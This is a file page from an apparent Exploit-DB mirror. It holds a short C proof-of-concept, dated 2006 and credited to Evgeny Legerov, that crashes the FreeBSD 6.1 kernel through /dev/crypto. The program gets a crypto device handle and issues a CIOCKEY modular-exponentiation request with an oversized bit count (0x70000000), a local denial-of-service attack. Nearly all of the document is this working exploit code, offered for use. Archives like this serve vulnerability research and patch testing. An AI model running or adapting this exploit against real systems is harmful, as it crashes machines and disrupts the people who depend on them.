exploit-db-mirror/exploits/bsd/dos/2639.c
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

39 lines
No EOL
790 B
C

// Evgeny Legerov (elegerov.blogspot.com)
#include unistd.h
#include sys/types.h
#include stdio.h
#include fcntl.h
#include crypto/cryptodev.h
int main()
{
int fd2, fd;
struct crypt_kop kop;
printf("FreeBSD 6.1 /dev/crypto local kernel DoS\n");
fd2 = open("/dev/crypto", O_RDWR, 0);
if (fd2 == -1){
perror("open");
exit(-1);
}
if (ioctl(fd2, CRIOGET, &fd) == -1) {
perror("ioctl");
exit(-1);
}
kop.crk_op = CRK_MOD_EXP;
kop.crk_iparams = 3;
kop.crk_oparams = 1;
kop.crk_param[0].crp_nbits = 0x70000000;
ioctl(fd, CIOCKEY, &kop);
printf("exploit failed\n");
return 0;
}
// milw0rm.com [2006-10-24]